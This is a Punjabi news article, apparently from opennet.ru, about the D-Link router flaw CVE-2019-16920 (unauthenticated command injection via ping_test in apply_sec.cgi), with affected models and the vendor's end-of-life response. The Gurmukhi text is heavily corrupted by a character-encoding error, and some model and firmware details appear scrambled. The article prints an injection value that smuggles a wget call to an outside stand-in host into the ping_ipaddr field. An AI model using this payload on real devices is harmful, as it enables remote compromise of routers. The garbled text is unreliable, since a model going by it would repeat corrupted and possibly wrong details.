เจกเฉ€-เจฒเจฟเฉฐเจ• เจฐเจพเจŠเจŸเจฐเจพเจ‚ เจตเจฟเฉฑเจš เจฐเจฟเจฎเฉ‹เจŸเจฒเฉ€ เจธเจผเฉ‹เจธเจผเจฃเจฏเฉ‹เจ— เจ•เจฎเจœเจผเฉ‹เจฐเฉ€

เจกเฉ€-เจฒเจฟเฉฐเจ• เจตเจพเจ‡เจฐเจฒเฉˆเฉฑเจธ เจฐเจพเจŠเจŸเจฐเจพเจ‚ เจตเจฟเฉฑเจš เจชเจ›เจพเจฃ เจ•เฉ€เจคเฉ€ เจ–เจผเจคเจฐเจจเจพเจ• เจ•เจฎเจœเจผเฉ‹เจฐเฉ€ (CVE-2019โ€“16920), เจœเฉ‹ เจคเฉเจนเจพเจจเฉ‚เฉฐ "เจชเจฟเฉฐเจ—_เจŸเฉˆเจธเจŸ" เจนเฉˆเจ‚เจกเจฒเจฐ เจจเฉ‚เฉฐ เจ‡เฉฑเจ• เจตเจฟเจธเจผเฉ‡เจธเจผ เจฌเฉ‡เจจเจคเฉ€ เจญเฉ‡เจœ เจ•เฉ‡ เจกเจฟเจตเจพเจˆเจธ เจธเจพเจˆเจก 'เจคเฉ‡ เจฐเจฟเจฎเฉ‹เจŸเจฒเฉ€ เจ•เฉ‹เจก เจจเฉ‚เฉฐ เจšเจฒเจพเจ‰เจฃ เจฆเฉ€ เจ†เจ—เจฟเจ† เจฆเจฟเฉฐเจฆเจพ เจนเฉˆ, เจชเฉเจฐเจฎเจพเจฃเจฟเจ•เจคเจพ เจคเฉ‹เจ‚ เจฌเจฟเจจเจพเจ‚ เจชเจนเฉเฉฐเจšเจฏเฉ‹เจ—เฅค

เจฆเจฟเจฒเจšเจธเจช เจ—เฉฑเจฒ เจ‡เจน เจนเฉˆ เจ•เจฟ, เจซเจฐเจฎเจตเฉ‡เจ…เจฐ เจกเจฟเจตเฉˆเจฒเจชเจฐเจพเจ‚ เจฆเฉ‡ เจ…เจจเฉเจธเจพเจฐ, "เจชเจฟเฉฐเจ—_เจŸเฉˆเจธเจŸ" เจ•เจพเจฒ เจจเฉ‚เฉฐ เจชเฉเจฐเจฎเจพเจฃเจฟเจ•เจคเจพ เจคเฉ‹เจ‚ เจฌเจพเจ…เจฆ เจนเฉ€ เจšเจฒเจพเจ‡เจ† เจœเจพเจฃเจพ เจšเจพเจนเฉ€เจฆเจพ เจนเฉˆ, เจชเจฐ เจ…เจธเจฒ เจตเจฟเฉฑเจš เจตเฉˆเฉฑเจฌ เจ‡เฉฐเจŸเจฐเจซเฉ‡เจธ เจตเจฟเฉฑเจš เจฒเฉŒเจ—เจ‡เจจ เจ•เจฐเจจ เจฆเฉ€ เจชเจฐเจตเจพเจน เจ•เฉ€เจคเฉ‡ เจฌเจฟเจจเจพเจ‚, เจ‡เจธเจจเฉ‚เฉฐ เจ•เจฟเจธเฉ‡ เจตเฉ€ เจธเจฅเจฟเจคเฉ€ เจตเจฟเฉฑเจš เจฌเฉเจฒเจพเจ‡เจ† เจœเจพเจ‚เจฆเจพ เจนเฉˆ. เจ–เจพเจธ เจคเฉŒเจฐ 'เจคเฉ‡, apply_sec.cgi เจธเจ•เฉเจฐเจฟเจชเจŸ เจจเฉ‚เฉฐ เจเจ•เจธเฉˆเจธ เจ•เจฐเจจ เจ…เจคเฉ‡ "action=ping_test" เจชเฉˆเจฐเจพเจฎเฉ€เจŸเจฐ เจจเฉ‚เฉฐ เจชเจพเจธ เจ•เจฐเจจ เจตเฉ‡เจฒเฉ‡, เจธเจ•เฉเจฐเจฟเจชเจŸ เจชเฉเจฐเจฎเจพเจฃเฉ€เจ•เจฐเจจ เจชเฉฐเจจเฉ‡ 'เจคเฉ‡ เจฐเฉ€เจกเจพเจ‡เจฐเฉˆเจ•เจŸ เจ•เจฐเจฆเฉ€ เจนเฉˆ, เจชเจฐ เจ‰เจธเฉ‡ เจธเจฎเฉ‡เจ‚ ping_test เจจเจพเจฒ เจธเฉฐเจฌเฉฐเจงเจฟเจค เจ•เจพเจฐเจตเจพเจˆ เจ•เจฐเจฆเฉ€ เจนเฉˆเฅค เจ•เฉ‹เจก เจจเฉ‚เฉฐ เจšเจฒเจพเจ‰เจฃ เจฒเจˆ, เจชเจฟเฉฐเจ—_เจŸเฉˆเจธเจŸ เจตเจฟเฉฑเจš เจ‡เฉฑเจ• เจนเฉ‹เจฐ เจ•เจฎเจœเจผเฉ‹เจฐเฉ€ เจตเจฐเจคเฉ€ เจ—เจˆ เจธเฉ€, เจœเฉ‹ เจœเจพเจ‚เจš เจฒเจˆ เจญเฉ‡เจœเฉ‡ เจ—เจ IP เจเจกเจฐเฉˆเฉฑเจธ เจฆเฉ€ เจธเจนเฉ€ เจœเจพเจ‚เจš เจ•เฉ€เจคเฉ‡ เจฌเจฟเจจเจพเจ‚ เจชเจฟเฉฐเจ— เจ‰เจชเจฏเฉ‹เจ—เจคเจพ เจจเฉ‚เฉฐ เจ•เจพเจฒ เจ•เจฐเจฆเฉ€ เจนเฉˆเฅค เจ‰เจฆเจพเจนเจฐเจจ เจฒเจˆ, wget เจ‰เจชเจฏเฉ‹เจ—เจคเจพ เจจเฉ‚เฉฐ เจ•เจพเจฒ เจ•เจฐเจจ เจ…เจคเฉ‡ "echo 1234" เจ•เจฎเจพเจ‚เจก เจฆเฉ‡ เจจเจคเฉ€เจœเจฟเจ†เจ‚ เจจเฉ‚เฉฐ เจ‡เฉฑเจ• เจฌเจพเจนเจฐเฉ€ เจนเฉ‹เจธเจŸ เจตเจฟเฉฑเจš เจŸเฉเจฐเจพเจ‚เจธเจซเจฐ เจ•เจฐเจจ เจฒเจˆ, เจธเจฟเจฐเจซเจผ "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://" เจชเฉˆเจฐเจพเจฎเฉ€เจŸเจฐ เจจเจฟเจฐเจงเจพเจฐเจค เจ•เจฐเฉ‹เฅค test.test/?$( echo 1234)"เฅค

เจกเฉ€-เจฒเจฟเฉฐเจ• เจฐเจพเจŠเจŸเจฐเจพเจ‚ เจตเจฟเฉฑเจš เจฐเจฟเจฎเฉ‹เจŸเจฒเฉ€ เจธเจผเฉ‹เจธเจผเจฃเจฏเฉ‹เจ— เจ•เจฎเจœเจผเฉ‹เจฐเฉ€

เจนเฉ‡เจ เจฒเฉ‡ เจฎเจพเจกเจฒเจพเจ‚ เจตเจฟเฉฑเจš เจ•เจฎเจœเจผเฉ‹เจฐเฉ€ เจฆเฉ€ เจฎเฉŒเจœเฉ‚เจฆเจ—เฉ€ เจฆเฉ€ เจ…เจงเจฟเจ•เจพเจฐเจค เจคเฉŒเจฐ 'เจคเฉ‡ เจชเฉเจธเจผเจŸเฉ€ เจ•เฉ€เจคเฉ€ เจ—เจˆ เจนเฉˆ:

  • DIR-655 เจซเจฐเจฎเจตเฉ‡เจ…เจฐ 3.02b05 เจœเจพเจ‚ เจชเฉเจฐเจพเจฃเฉ‡ เจจเจพเจฒ;
  • เจซเจฐเจฎเจตเฉ‡เจ…เจฐ 866b1.03 เจœเจพเจ‚ เจชเฉเจฐเจพเจฃเฉ‡ เจจเจพเจฒ DIR-04L;
  • DIR-1565 เจซเจฐเจฎเจตเฉ‡เจ…เจฐ 1.01 เจœเจพเจ‚ เจ‡เจธ เจคเฉ‹เจ‚ เจชเฉเจฐเจพเจฃเฉ‡ เจจเจพเจฒ;
  • DIR-652 (เจธเจฎเฉฑเจธเจฟเจ† เจตเจพเจฒเฉ‡ เจซเจฐเจฎเจตเฉ‡เจ…เจฐ เจธเฉฐเจธเจ•เจฐเจฃเจพเจ‚ เจฌเจพเจฐเฉ‡ เจ•เฉ‹เจˆ เจœเจพเจฃเจ•เจพเจฐเฉ€ เจชเฉเจฐเจฆเจพเจจ เจจเจนเฉ€เจ‚ เจ•เฉ€เจคเฉ€ เจ—เจˆ เจนเฉˆ)

เจ‡เจนเจจเจพเจ‚ เจฎเจพเจกเจฒเจพเจ‚ เจฒเจˆ เจธเจฎเจฐเจฅเจจ เจฆเฉ€ เจฎเจฟเจ†เจฆ เจชเจนเจฟเจฒเจพเจ‚ เจนเฉ€ เจ–เจคเจฎ เจนเฉ‹ เจšเฉเฉฑเจ•เฉ€ เจนเฉˆ, เจ‡เจธเจฒเจˆ เจกเฉ€-เจฒเจฟเฉฐเจ• เจจเฉ‡ เจ•เจฟเจนเจพ, เจœเฉ‹ เจ•เจฎเจœเจผเฉ‹เจฐเฉ€ เจจเฉ‚เฉฐ เจ–เจคเจฎ เจ•เจฐเจจ เจฒเจˆ เจ‰เจนเจจเจพเจ‚ เจฒเจˆ เจ…เฉฑเจชเจกเฉ‡เจŸ เจœเจพเจฐเฉ€ เจจเจนเฉ€เจ‚ เจ•เจฐเฉ‡เจ—เจพ, เจ‰เจนเจจเจพเจ‚ เจจเฉ‚เฉฐ เจตเจฐเจคเจฃ เจฆเฉ€ เจธเจฟเจซเจพเจฐเจธเจผ เจจเจนเฉ€เจ‚ เจ•เจฐเจฆเจพ เจนเฉˆ เจ…เจคเฉ‡ เจ‰เจนเจจเจพเจ‚ เจจเฉ‚เฉฐ เจจเจตเฉ‡เจ‚ เจกเจฟเจตเจพเจˆเจธเจพเจ‚ เจจเจพเจฒ เจฌเจฆเจฒเจฃ เจฆเฉ€ เจธเจฒเจพเจน เจฆเจฟเฉฐเจฆเจพ เจนเฉˆเฅค เจ‡เฉฑเจ• เจธเฉเจฐเฉฑเจ–เจฟเจ† เจนเฉฑเจฒ เจตเจœเฉ‹เจ‚, เจคเฉเจธเฉ€เจ‚ เจตเฉˆเฉฑเจฌ เจ‡เฉฐเจŸเจฐเจซเฉ‡เจธ เจคเฉฑเจ• เจชเจนเฉเฉฐเจš เจจเฉ‚เฉฐ เจธเจฟเจฐเจซเจผ เจญเจฐเฉ‹เจธเฉ‡เจฏเฉ‹เจ— IP เจชเจคเจฟเจ†เจ‚ เจคเฉฑเจ• เจธเฉ€เจฎเจค เจ•เจฐ เจธเจ•เจฆเฉ‡ เจนเฉ‹เฅค

เจฌเจพเจ…เจฆ เจตเจฟเฉฑเจš เจชเจคเจพ เจฒเฉฑเจ—เจพ เจ•เจฟ เจ•เจฎเจœเจผเฉ‹เจฐเฉ€ เจตเฉ€ เจธเฉ€ เจชเฉเจฐเจญเจพเจตเจฟเจค เจ•เจฐเจฆเจพ เจนเฉˆ เจฎเจพเจกเจฒ DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 เจ…เจคเฉ‡ DIR-825, เจ…เฉฑเจชเจกเฉ‡เจŸ เจœเจพเจฐเฉ€ เจ•เจฐเจจ เจฆเฉ€เจ†เจ‚ เจฏเฉ‹เจœเจจเจพเจตเจพเจ‚ เจœเจฟเจจเฉเจนเจพเจ‚ เจฒเจˆ เจ…เจœเฉ‡ เจชเจคเจพ เจจเจนเฉ€เจ‚ เจนเฉˆเฅค

เจธเจฐเฉ‹เจค: opennet.ru

เจ‡เฉฑเจ• เจŸเจฟเฉฑเจชเจฃเฉ€ เจœเฉ‹เฉœเฉ‹